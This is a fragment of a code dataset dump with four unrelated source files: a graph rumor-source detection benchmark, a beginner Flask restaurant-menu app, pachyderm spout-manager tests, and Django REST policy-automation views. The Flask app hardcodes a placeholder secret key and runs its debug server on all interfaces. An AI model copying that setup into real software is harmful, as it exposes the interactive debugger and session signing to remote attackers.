"usage_type": "name"}]} +{"seq_id": "224911533", "text": "import os\nimport random\nimport sys\nimport time\nfrom sys import platform as _platform\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport numpy as np\nimport scipy.io as io\nfrom tqdm import tqdm\n\nimport estimation\nimport utilities\n\n\n# Detect source from a diffusion graph\ndef detect_source(source, adjacency, who_infected):\n\n # Jordan-centrality estimate\n jordan_estimate = estimation.jordan_centrality(who_infected)\n jordan_dist = estimation.get_estimate_dist(source, jordan_estimate, adjacency)\n\n # Rumor centrality estimate\n rumor_estimate = estimation.rumor_centrality(who_infected)\n rumor_dist = estimation.get_estimate_dist(source, rumor_estimate, adjacency)\n\n # ML estimate\n ml_estimate, _ = estimation.max_likelihood(who_infected, adjacency)\n ml_dist = estimation.get_estimate_dist(source, ml_estimate, adjacency)\n\n results = (jordan_dist, rumor_dist, ml_dist)\n # results = (jordan_estimate, rumor_estimate, ml_estimate)\n return results\n\ndef compute_distance(source, node, graph):\n ctg_path = nx.astar_path(graph, source, node)\n dis = len(ctg_path) - 1\n return dis\n\nif __name__ == \"__main__\":\n\n result_path = \"results/\"\n data_path = \"../source_tracer/data/\"\n \n start = time.clock()\n names = ['tvshow', 'as', 'fb', 'politician', 'gov']\n for graph_name in names:\n print(\"Graph:\", graph_name)\n jordan_distances, rumor_distances, ml_distances = [], [], []\n gf = utilities.graphFetcher(graph_name=graph_name, data_path=data_path, flag='test', size=(20, 10000))\n\n pbar = tqdm(range(len(gf)))\n for _ in pbar:\n g, info = next(gf)\n adjacency, who_infected, source = utilities.build_adjacency(g, info)\n results = detect_source(source, adjacency, who_infected)\n j, r, m = results\n jordan_distances.append(j)\n rumor_distances.append(r)\n ml_distances.append(m)\n pbar.set_description('jordan error %d rumor error %d ml error %d' % (j, r, m))\n print(\"jordan avg error: %.2f\" % 
np.mean(jordan_distances))\n print(\"rumor avg error: %.2f\" % np.mean(rumor_distances))\n print(\"ml avg error: %.2f\" % np.mean(ml_distances))\n\n path = os.path.join(result_path, graph_name)\n assert(utilities.check_path(path))\n np.save(os.path.join(path, \"jordan_results.npy\"), jordan_distances)\n np.save(os.path.join(path, \"rumor_results.npy\"), rumor_distances)\n np.save(os.path.join(path, \"ml_results.npy\"), ml_distances)\n print(\"Experiment took %.3f seconds.\" % (time.perf_counter() - start))", "sub_path": "python/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 2610, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "estimation.jordan_centrality", "line_number": 21, "usage_type": "call"}, {"api_name": "estimation.get_estimate_dist", "line_number": 22, "usage_type": "call"}, {"api_name": "estimation.rumor_centrality", "line_number": 25, "usage_type": "call"}, {"api_name": "estimation.get_estimate_dist", "line_number": 26, "usage_type": "call"}, {"api_name": "estimation.max_likelihood", "line_number": 29, "usage_type": "call"}, {"api_name": "estimation.get_estimate_dist", "line_number": 30, "usage_type": "call"}, {"api_name": "networkx.astar_path", "line_number": 37, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 46, "usage_type": "call"}, {"api_name": "utilities.graphFetcher", "line_number": 51, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 53, "usage_type": "call"}, {"api_name": "utilities.build_adjacency", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "utilities.check_path", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "time.perf_counter", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "18183219", "text": "from flask import Flask, render_template, request, redirect, url_for, flash,jsonify\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom setup_db import Base, Restaurant, MenuItem\nengine= create_engine(\"sqlite:///restaurantmenu.db\")\nBase.metadata.bind=engine\nDBSession= sessionmaker(bind=engine)\nsession= DBSession()\napp = Flask(__name__)\n\n# @app.route(\"/\")\n@app.route(\"/restaurants/<int:restaurant_id>/menu/json/\")\ndef jsonifyMenuItems(restaurant_id):\n restaurant= session.query(Restaurant).filter_by(id=restaurant_id).one()\n items=session.query(MenuItem).filter_by(restaurant_id=restaurant_id)\n return jsonify(MenuItem=[item.serialize for item in items])\n\n# ADD JSON ENDPOINT HERE\n@app.route(\"/restaurants/<int:restaurant_id>/menu/json/<int:menu_id>/\")\ndef 
menuItemJSON(restaurant_id, menu_id):\n menuItem = session.query(MenuItem).filter_by(id=menu_id).one()\n return jsonify(MenuItem=menuItem.serialize)\n\n\n@app.route('/')\n@app.route(\"/restaurants/<int:restaurant_id>/\")\ndef restaurant_menue(restaurant_id):\n restaurant= session.query(Restaurant).filter_by(id=restaurant_id).one()\n items=session.query(MenuItem).filter_by(restaurant_id=restaurant_id)\n return render_template(\"menu.html\", items=items, restaurant=restaurant)\n\n\n# @app.route(\"/\")\n@app.route(\"/restaurants/<int:restaurant_id>/new/\", methods=['GET','POST'])\ndef newMenuItem(restaurant_id):\n # return \"page to create a new menu item. Task 1 complete!\"\n if request.method==\"POST\":\n newItem= MenuItem(name= request.form['name'], description= request.form['description'],\n price= request.form['price'], restaurant_id=restaurant_id)\n session.add(newItem)\n session.commit()\n flash(\"new menu item is created\")\n return redirect(url_for('restaurant_menue', restaurant_id=restaurant_id))\n else:\n return render_template('newitemMenu.html', restaurant_id=restaurant_id)\n\n\n\n\n# Task 2: Create route for editMenuItem function here\n\n# @app.route(\"/\")\n@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/edit/',methods=['GET', 'POST'])\ndef editMenuItem(restaurant_id, menu_id):\n edittedItem= session.query(MenuItem).filter_by(id=menu_id).one()\n if request.method==\"POST\":\n if request.form['name']:\n edittedItem.name=request.form['name']\n if request.form['price']:\n edittedItem.price=request.form['price']\n if request.form['description']:\n edittedItem.description=request.form['description']\n if request.form['course']:\n edittedItem.course=request.form['course']\n session.add(edittedItem)\n session.commit()\n flash(\"menu items are editted\")\n return redirect(url_for('restaurant_menue', restaurant_id=restaurant_id))\n else:\n return render_template(\"editMenu.html\",\n restaurant_id=restaurant_id,\n menu_id=menu_id,\n item=edittedItem)\n\n\n# @app.route(\"/\")\n@app.route(\"/restaurants/<int:restaurant_id>/<int:menu_id>/delete/\", methods=['GET','POST'])\ndef deleteMenuItem(restaurant_id, menu_id):\n itemDeleted= session.query(MenuItem).filter_by(id=menu_id).one()\n if request.method==\"POST\":\n session.delete(itemDeleted)\n session.commit()\n flash(\"menu item is deleted\")\n return redirect(url_for(\"restaurant_menue\", restaurant_id=restaurant_id))\n return render_template('deleteMenuItem.html',item=itemDeleted)\n\n\n\n\n\nif __name__ == \"__main__\":\n app.secret_key=\"super secret key\"\n app.debug=True\n app.run(\"0.0.0.0\", 8000)\n", "sub_path": "full_stack_project/flask_project/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3551, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 5, "usage_type": "call"}, {"api_name": "setup_db.Base.metadata", "line_number": 6, "usage_type": "attribute"}, {"api_name": "setup_db.Base", "line_number": 6, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "setup_db.Restaurant", "line_number": 14, "usage_type": "argument"}, {"api_name": "setup_db.MenuItem", "line_number": 15, "usage_type": "argument"}, {"api_name": "flask.jsonify", "line_number": 16, "usage_type": "call"}, {"api_name": "setup_db.MenuItem", "line_number": 21, "usage_type": "argument"}, {"api_name": "flask.jsonify", "line_number": 22, "usage_type": "call"}, {"api_name": 
"setup_db.Restaurant", "line_number": 28, "usage_type": "argument"}, {"api_name": "setup_db.MenuItem", "line_number": 29, "usage_type": "argument"}, {"api_name": "flask.render_template", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 37, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 37, "usage_type": "name"}, {"api_name": "setup_db.MenuItem", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 42, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 45, "usage_type": "call"}, {"api_name": "setup_db.MenuItem", "line_number": 55, "usage_type": "argument"}, {"api_name": "flask.request.method", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 61, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 61, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 62, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 63, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 70, "usage_type": "call"}, {"api_name": "setup_db.MenuItem", "line_number": 79, "usage_type": "argument"}, {"api_name": "flask.request.form", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "652074738", "text": "#!/usr/bin/env python\n\n\"\"\"Tests of spout managers.\"\"\"\n\nimport tempfile\n\nimport pytest\nimport python_pachyderm\nimport tarfile\nfrom os.path import 
join\n\n\ndef test_spout_manager():\n with tempfile.TemporaryDirectory(suffix=\"pachyderm\") as d:\n manager = python_pachyderm.SpoutManager(\n pfs_directory=d, marker_filename=\"marker\"\n )\n\n with manager.commit() as commit:\n commit.put_file_from_bytes(\"foo1.txt\", b\"bar1\")\n commit.put_marker_from_bytes(b\"marker1\")\n\n # Validate output\n with tarfile.open(join(d, \"out\"), \"r:\") as t:\n with t.extractfile(\"foo1.txt\") as x:\n assert x.read() == b\"bar1\"\n with t.extractfile(\"marker\") as x:\n assert x.read() == b\"marker1\"\n\n with manager.commit() as commit:\n commit.put_file_from_bytes(\"foo2.txt\", b\"bar2\")\n commit.put_marker_from_bytes(b\"marker2\")\n\n # Validate output (note that because the most recent writes simply\n # appended to the existing tar file, we must set ignore_zeros to ignore\n # the extra padding before the second set of tar headers)\n with tarfile.open(join(d, \"out\"), \"r:\", ignore_zeros=True) as t:\n with t.extractfile(\"foo2.txt\") as x:\n assert x.read() == b\"bar2\"\n with t.extractfile(\"marker\") as x:\n assert x.read() == b\"marker2\"\n\n\ndef test_spout_manager_nested_commits():\n with tempfile.TemporaryDirectory(suffix=\"pachyderm\") as d:\n manager = python_pachyderm.SpoutManager(\n pfs_directory=d, marker_filename=\"marker\"\n )\n\n with manager.commit() as commit:\n commit.put_file_from_bytes(\"foo1.txt\", b\"bar1\")\n commit.put_marker_from_bytes(b\"marker1\")\n\n with pytest.raises(Exception):\n with manager.commit() as commit:\n pass\n\n\ndef test_spout_manager_commit_state():\n with tempfile.TemporaryDirectory(suffix=\"pachyderm\") as d:\n manager = python_pachyderm.SpoutManager(\n pfs_directory=d, marker_filename=\"marker\"\n )\n\n for _ in range(3):\n with pytest.raises(Exception):\n with manager.commit() as commit:\n raise Exception()\n assert not manager._has_open_commit\n\n # Now try to use the spout manager normally & confirm it still works\n with manager.commit() as commit:\n commit.put_file_from_bytes(\"foo1.txt\", b\"bar1\")\n commit.put_marker_from_bytes(b\"marker1\")\n\n # Validate output. 
See note above re:ignore_zeros\n with tarfile.open(join(d, \"out\"), \"r:\", ignore_zeros=True) as t:\n with t.extractfile(\"foo1.txt\") as x:\n assert x.read() == b\"bar1\"\n with t.extractfile(\"marker\") as x:\n assert x.read() == b\"marker1\"\n", "sub_path": "tests/test_spout.py", "file_name": "test_spout.py", "file_ext": "py", "file_size_in_byte": 2874, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "tempfile.TemporaryDirectory", "line_number": 14, "usage_type": "call"}, {"api_name": "python_pachyderm.SpoutManager", "line_number": 15, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 45, "usage_type": "call"}, {"api_name": "python_pachyderm.SpoutManager", "line_number": 46, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 54, "usage_type": "call"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 60, "usage_type": "call"}, {"api_name": "python_pachyderm.SpoutManager", "line_number": 61, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 66, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "389915310", "text": "from django.shortcuts import get_object_or_404\r\n\r\nfrom rest_framework.views import APIView\r\nfrom rest_framework.response import Response\r\nfrom rest_framework import status\r\n\r\nfrom .models import Policy\r\nfrom agents.models import Agent\r\nfrom clients.models import Client, Site\r\nfrom checks.models import Check\r\nfrom autotasks.models import AutomatedTask\r\nfrom winupdate.models import WinUpdatePolicy\r\n\r\nfrom clients.serializers import ClientSerializer, SiteSerializer\r\nfrom agents.serializers import AgentHostnameSerializer\r\nfrom winupdate.serializers import WinUpdatePolicySerializer\r\n\r\nfrom .serializers import (\r\n PolicySerializer,\r\n PolicyTableSerializer,\r\n PolicyOverviewSerializer,\r\n PolicyCheckStatusSerializer,\r\n PolicyCheckSerializer,\r\n PolicyTaskStatusSerializer,\r\n AutoTaskPolicySerializer,\r\n RelatedClientPolicySerializer,\r\n RelatedSitePolicySerializer,\r\n RelatedAgentPolicySerializer,\r\n)\r\n\r\nfrom .tasks import (\r\n generate_agent_checks_from_policies_task,\r\n generate_agent_checks_by_location_task,\r\n generate_agent_tasks_from_policies_task,\r\n run_win_policy_autotask_task,\r\n)\r\n\r\n\r\nclass GetAddPolicies(APIView):\r\n def get(self, request):\r\n policies = Policy.objects.all()\r\n\r\n return Response(PolicyTableSerializer(policies, many=True).data)\r\n\r\n def post(self, request):\r\n serializer = PolicySerializer(data=request.data, partial=True)\r\n serializer.is_valid(raise_exception=True)\r\n policy = serializer.save()\r\n\r\n # copy checks and tasks from specified policy\r\n if \"copyId\" in request.data:\r\n copyPolicy = Policy.objects.get(pk=request.data[\"copyId\"])\r\n\r\n checks = copyPolicy.policychecks.all()\r\n for check in checks:\r\n check.create_policy_check(policy=policy)\r\n\r\n tasks = copyPolicy.autotasks.all()\r\n\r\n for task in tasks:\r\n task.create_policy_task(policy=policy)\r\n\r\n return Response(\"ok\")\r\n\r\n\r\nclass 
GetUpdateDeletePolicy(APIView):\r\n def get(self, request, pk):\r\n policy = get_object_or_404(Policy, pk=pk)\r\n\r\n return Response(PolicySerializer(policy).data)\r\n\r\n def put(self, request, pk):\r\n policy = get_object_or_404(Policy, pk=pk)\r\n\r\n old_active = policy.active\r\n old_enforced = policy.enforced\r\n\r\n serializer = PolicySerializer(instance=policy, data=request.data, partial=True)\r\n serializer.is_valid(raise_exception=True)\r\n saved_policy = serializer.save()\r\n\r\n # Generate agent checks only if active and enforced were changed\r\n if saved_policy.active != old_active or saved_policy.enforced != old_enforced:\r\n generate_agent_checks_from_policies_task.delay(\r\n policypk=policy.pk,\r\n create_tasks=(saved_policy.active != old_active),\r\n )\r\n\r\n return Response(\"ok\")\r\n\r\n def delete(self, request, pk):\r\n policy = get_object_or_404(Policy, pk=pk)\r\n\r\n # delete all managed policy checks off of agents\r\n generate_agent_checks_from_policies_task.delay(policypk=policy.pk)\r\n generate_agent_tasks_from_policies_task.delay(policypk=policy.pk)\r\n policy.delete()\r\n\r\n return Response(\"ok\")\r\n\r\n\r\nclass PolicyAutoTask(APIView):\r\n\r\n # tasks associated with policy\r\n def get(self, request, pk):\r\n policy = get_object_or_404(Policy, pk=pk)\r\n return Response(AutoTaskPolicySerializer(policy).data)\r\n\r\n # get status of all tasks\r\n def patch(self, request, task):\r\n tasks = AutomatedTask.objects.filter(parent_task=task)\r\n return Response(PolicyTaskStatusSerializer(tasks, many=True).data)\r\n\r\n # bulk run win tasks associated with policy\r\n def put(self, request, task):\r\n tasks = AutomatedTask.objects.filter(parent_task=task)\r\n run_win_policy_autotask_task.delay([task.id for task in tasks])\r\n return Response(\"Affected agent tasks will run shortly\")\r\n\r\n\r\nclass PolicyCheck(APIView):\r\n def get(self, request, pk):\r\n checks = Check.objects.filter(policy__pk=pk, agent=None)\r\n return Response(PolicyCheckSerializer(checks, many=True).data)\r\n\r\n def patch(self, request, check):\r\n checks = Check.objects.filter(parent_check=check)\r\n return Response(PolicyCheckStatusSerializer(checks, many=True).data)\r\n\r\n\r\nclass OverviewPolicy(APIView):\r\n def get(self, request):\r\n\r\n clients = Client.objects.all()\r\n return Response(PolicyOverviewSerializer(clients, many=True).data)\r\n\r\n\r\nclass GetRelated(APIView):\r\n def get(self, request, pk):\r\n\r\n response = {}\r\n\r\n policy = (\r\n Policy.objects.filter(pk=pk)\r\n .prefetch_related(\r\n \"workstation_clients\",\r\n \"workstation_sites\",\r\n \"server_clients\",\r\n \"server_sites\",\r\n )\r\n .first()\r\n )\r\n\r\n response[\"default_server_policy\"] = policy.is_default_server_policy\r\n response[\"default_workstation_policy\"] = policy.is_default_workstation_policy\r\n\r\n response[\"server_clients\"] = ClientSerializer(\r\n policy.server_clients.all(), many=True\r\n ).data\r\n response[\"workstation_clients\"] = ClientSerializer(\r\n policy.workstation_clients.all(), many=True\r\n ).data\r\n\r\n filtered_server_sites = list()\r\n filtered_workstation_sites = list()\r\n\r\n for client in policy.server_clients.all():\r\n for site in client.sites.all():\r\n if site not in policy.server_sites.all():\r\n filtered_server_sites.append(site)\r\n\r\n response[\"server_sites\"] = SiteSerializer(\r\n filtered_server_sites + list(policy.server_sites.all()), many=True\r\n ).data\r\n\r\n for client in policy.workstation_clients.all():\r\n for site in client.sites.all():\r\n 
if site not in policy.workstation_sites.all():\r\n filtered_workstation_sites.append(site)\r\n\r\n response[\"workstation_sites\"] = SiteSerializer(\r\n filtered_workstation_sites + list(policy.workstation_sites.all()), many=True\r\n ).data\r\n\r\n response[\"agents\"] = AgentHostnameSerializer(\r\n policy.related_agents(),\r\n many=True,\r\n ).data\r\n\r\n return Response(response)\r\n\r\n # update agents, clients, sites to policy\r\n def post(self, request):\r\n\r\n related_type = request.data[\"type\"]\r\n pk = request.data[\"pk\"]\r\n\r\n # workstation policy is set\r\n if (\r\n \"workstation_policy\" in request.data\r\n and request.data[\"workstation_policy\"] != 0\r\n ):\r\n policy = get_object_or_404(Policy, pk=request.data[\"workstation_policy\"])\r\n\r\n if related_type == \"client\":\r\n client = get_object_or_404(Client, pk=pk)\r\n\r\n # Check and see if workstation policy changed and regenerate policies\r\n if (\r\n not client.workstation_policy\r\n or client.workstation_policy\r\n and client.workstation_policy.pk != policy.pk\r\n ):\r\n client.workstation_policy = policy\r\n client.save()\r\n\r\n generate_agent_checks_by_location_task.delay(\r\n location={\"site__client_id\": client.id},\r\n mon_type=\"workstation\",\r\n create_tasks=True,\r\n )\r\n\r\n if related_type == \"site\":\r\n site = get_object_or_404(Site, pk=pk)\r\n\r\n # Check and see if workstation policy changed and regenerate policies\r\n if (\r\n not site.workstation_policy\r\n or site.workstation_policy\r\n and site.workstation_policy.pk != policy.pk\r\n ):\r\n site.workstation_policy = policy\r\n site.save()\r\n generate_agent_checks_by_location_task.delay(\r\n location={\"site_id\": site.id},\r\n mon_type=\"workstation\",\r\n create_tasks=True,\r\n )\r\n\r\n # server policy is set\r\n if \"server_policy\" in request.data and request.data[\"server_policy\"] != 0:\r\n policy = get_object_or_404(Policy, pk=request.data[\"server_policy\"])\r\n\r\n if related_type == \"client\":\r\n client = get_object_or_404(Client, pk=pk)\r\n\r\n # Check and see if server policy changed and regenerate policies\r\n if (\r\n not client.server_policy\r\n or client.server_policy\r\n and client.server_policy.pk != policy.pk\r\n ):\r\n client.server_policy = policy\r\n client.save()\r\n generate_agent_checks_by_location_task.delay(\r\n location={\"site__client_id\": client.id},\r\n mon_type=\"server\",\r\n create_tasks=True,\r\n )\r\n\r\n if related_type == \"site\":\r\n site = get_object_or_404(Site, pk=pk)\r\n\r\n # Check and see if server policy changed and regenerate policies\r\n if (\r\n not site.server_policy\r\n or site.server_policy\r\n and site.server_policy.pk != policy.pk\r\n ):\r\n site.server_policy = policy\r\n site.save()\r\n generate_agent_checks_by_location_task.delay(\r\n location={\"site_id\": site.id},\r\n mon_type=\"server\",\r\n create_tasks=True,\r\n )\r\n\r\n # If workstation policy was cleared\r\n if (\r\n \"workstation_policy\" in request.data\r\n and request.data[\"workstation_policy\"] == 0\r\n ):\r\n if related_type == \"client\":\r\n client = get_object_or_404(Client, pk=pk)\r\n\r\n # Check if workstation policy is set and update it to None\r\n if client.workstation_policy:\r\n\r\n client.workstation_policy = None\r\n client.save()\r\n generate_agent_checks_by_location_task.delay(\r\n location={\"site__client_id\": client.id},\r\n mon_type=\"workstation\",\r\n create_tasks=True,\r\n )\r\n\r\n if related_type == \"site\":\r\n site = get_object_or_404(Site, pk=pk)\r\n\r\n # Check if workstation policy is 
set and update it to None\r\n if site.workstation_policy:\r\n\r\n site.workstation_policy = None\r\n site.save()\r\n generate_agent_checks_by_location_task.delay(\r\n location={\"site_id\": site.id},\r\n mon_type=\"workstation\",\r\n create_tasks=True,\r\n )\r\n\r\n # server policy cleared\r\n if \"server_policy\" in request.data and request.data[\"server_policy\"] == 0:\r\n\r\n if related_type == \"client\":\r\n client = get_object_or_404(Client, pk=pk)\r\n\r\n # Check if server policy is set and update it to None\r\n if client.server_policy:\r\n\r\n client.server_policy = None\r\n client.save()\r\n generate_agent_checks_by_location_task.delay(\r\n location={\"site__client_id\": client.id},\r\n mon_type=\"server\",\r\n create_tasks=True,\r\n )\r\n\r\n if related_type == \"site\":\r\n site = get_object_or_404(Site, pk=pk)\r\n # Check if server policy is set and update it to None\r\n if site.server_policy:\r\n\r\n site.server_policy = None\r\n site.save()\r\n generate_agent_checks_by_location_task.delay(\r\n location={\"site_id\": site.pk},\r\n mon_type=\"server\",\r\n create_tasks=True,\r\n )\r\n\r\n # agent policies\r\n if related_type == \"agent\":\r\n agent = get_object_or_404(Agent, pk=pk)\r\n\r\n if \"policy\" in request.data and request.data[\"policy\"] != 0:\r\n policy = Policy.objects.get(pk=request.data[\"policy\"])\r\n\r\n # Check and see if policy changed and regenerate policies\r\n if not agent.policy or agent.policy and agent.policy.pk != policy.pk:\r\n agent.policy = policy\r\n agent.save()\r\n agent.generate_checks_from_policies()\r\n agent.generate_tasks_from_policies()\r\n else:\r\n if agent.policy:\r\n agent.policy = None\r\n agent.save()\r\n agent.generate_checks_from_policies()\r\n agent.generate_tasks_from_policies()\r\n\r\n return Response(\"ok\")\r\n\r\n # view to get policies set on client, site, and workstation\r\n def patch(self, request):\r\n related_type = request.data[\"type\"]\r\n\r\n # client, site, or agent pk\r\n pk = request.data[\"pk\"]\r\n\r\n if related_type == \"agent\":\r\n agent = Agent.objects.get(pk=pk)\r\n return Response(RelatedAgentPolicySerializer(agent).data)\r\n\r\n if related_type == \"site\":\r\n site = Site.objects.get(pk=pk)\r\n return Response(RelatedSitePolicySerializer(site).data)\r\n\r\n if related_type == \"client\":\r\n client = Client.objects.get(pk=pk)\r\n return Response(RelatedClientPolicySerializer(client).data)\r\n\r\n content = {\"error\": \"Data was submitted incorrectly\"}\r\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass UpdatePatchPolicy(APIView):\r\n\r\n # create new patch policy\r\n def post(self, request):\r\n policy = get_object_or_404(Policy, pk=request.data[\"policy\"])\r\n\r\n serializer = WinUpdatePolicySerializer(data=request.data, partial=True)\r\n serializer.is_valid(raise_exception=True)\r\n serializer.policy = policy\r\n serializer.save()\r\n\r\n return Response(\"ok\")\r\n\r\n # update patch policy\r\n def put(self, request, patchpolicy):\r\n policy = get_object_or_404(WinUpdatePolicy, pk=patchpolicy)\r\n\r\n serializer = WinUpdatePolicySerializer(\r\n instance=policy, data=request.data, partial=True\r\n )\r\n serializer.is_valid(raise_exception=True)\r\n serializer.save()\r\n\r\n return Response(\"ok\")\r\n\r\n # bulk reset agent patch policy\r\n def patch(self, request):\r\n\r\n agents = None\r\n if \"client\" in request.data:\r\n agents = Agent.objects.prefetch_related(\"winupdatepolicy\").filter(\r\n site__client_id=request.data[\"client\"]\r\n )\r\n elif \"site\" in 
request.data:\r\n agents = Agent.objects.prefetch_related(\"winupdatepolicy\").filter(\r\n site_id=request.data[\"site\"]\r\n )\r\n else:\r\n agents = Agent.objects.prefetch_related(\"winupdatepolicy\").only(\"pk\")\r\n\r\n for agent in agents:\r\n winupdatepolicy = agent.winupdatepolicy.get()\r\n winupdatepolicy.critical = \"inherit\"\r\n winupdatepolicy.important = \"inherit\"\r\n winupdatepolicy.moderate = \"inherit\"\r\n winupdatepolicy.low = \"inherit\"\r\n winupdatepolicy.other = \"inherit\"\r\n winupdatepolicy.run_time_frequency = \"inherit\"\r\n winupdatepolicy.reboot_after_install = \"inherit\"\r\n winupdatepolicy.reprocess_failed_inherit = True\r\n winupdatepolicy.save(\r\n update_fields=[\r\n \"critical\",\r\n \"important\",\r\n \"moderate\",\r\n \"low\",\r\n \"other\",\r\n \"run_time_frequency\",\r\n \"reboot_after_install\",\r\n \"reprocess_failed_inherit\",\r\n ]\r\n )\r\n\r\n return Response(\"ok\")\r\n\r\n # delete patch policy\r\n def delete(self, request, patchpolicy):\r\n get_object_or_404(WinUpdatePolicy, pk=patchpolicy).delete()\r\n\r\n return Response(\"ok\")\r\n", "sub_path": "api/tacticalrmm/automation/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 16507, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rest_framework.views.APIView", "line_number": 39, "usage_type": "name"}, {"api_name": "models.Policy.objects.all", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Policy.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "models.Policy", "line_number": 41, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 43, "usage_type": "call"}, {"api_name": "serializers.PolicyTableSerializer", "line_number": 43, "usage_type": "call"}, {"api_name": "serializers.PolicySerializer", "line_number": 46, "usage_type": "call"}, {"api_name": "models.Policy.objects.get", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Policy.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "models.Policy", "line_number": 52, "usage_type": "name"}, {"api_name": "checks.models", "line_number": 54, "usage_type": "name"}, {"api_name": "checks.models", "line_number": 55, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 63, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 68, "usage_type": "call"}, {"api_name": "models.Policy", "line_number": 68, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 70, "usage_type": "call"}, {"api_name": "serializers.PolicySerializer", "line_number": 70, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Policy", "line_number": 73, "usage_type": "argument"}, {"api_name": "serializers.PolicySerializer", 